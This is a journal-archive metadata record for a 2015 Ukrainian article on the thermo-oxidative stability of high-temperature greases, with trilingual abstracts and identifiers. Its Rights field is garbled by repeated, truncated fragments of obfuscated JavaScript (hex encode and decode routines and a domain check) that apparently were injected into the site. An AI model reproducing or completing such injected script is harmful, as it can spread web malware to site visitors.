Record Details

Термоокиснювальна стабільність високотемпературних пластичних мастил

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Термоокиснювальна стабільність високотемпературних пластичних мастил
Термоокислительная стабильность высокотемпературных пластичных смазок
THERMO-OXIDATIVE STABILITY OF HIGH-TEMPERATURE GREASES
 
Creator Zheleznyi, Leonid; Institute of Bioorganic Chemistry and Petrochemistry, NAS of Ukraine
 
Subject
залишкова нафтова олива; кінетичний параметр; пластичне мастило; термоокиснювальна стабільність
665.765-404.9035.5

кинетический параметр; остаточное нефтяное масло; пластичная смазка; термоокислительная стабильность
665.765-404.9035.5

greas; kinetic parameter; residual petroleum oils; thermooxidative stability
665.765-404.9035.5
 
Description Встановлено зв’язок між груповим вуглеводневим складом базових нафтових олив і термоокиснювальними властивостями високотемпературних комплексних літійових мастил. Пояснені відмінності в антиокиснювальних характеристиках модельних мастил. Встановлено, що мастила на залишкових оливах характеризуються високими антиокиснювальними властивостями в широкому температурному діапазоні застосування і можуть використовуватися як основний компонент дисперсійного середовища високотемпературних мастил.
Установлена связь между групповым углеводородным составом базовых нефтяных масел и термоокислительными свойствами высокотемпературных комплексных литиевых смазок. Объяснены различия в антиокислительных характеристиках модельных смазок. Установлено, что смазки на остаточных маслах характеризуются высокими антиокислительными свойствами в широком температурном диапазоне применения и могут использоваться как основной компонент дисперсионной среды высокотемпературных смазок.
It the article is established the connection between a group hydro-carbon composition of basic petroleum oils and thermooxidative properties of high-temperature lithium complex greases. Differences in thermooxidative properties of model greases were explained. Greases on the residual oils were characterised by high anti-oxidative properties over a wide range of application temperatures and could be used as the main component of a dispersion medium of high temperature greases.
 
Publisher National Aviation University
 
Contributor


 
Date 2015-12-10
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/9859
10.18372/2306-1472.65.9859
 
Source Proceedings of the National Aviation University; Том 65, № 4 (2015); 77-82
Вестник Национального авиационного университета; Том 65, № 4 (2015); 77-82
Вісник Національного Авіаційного Університету; Том 65, № 4 (2015); 77-82
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ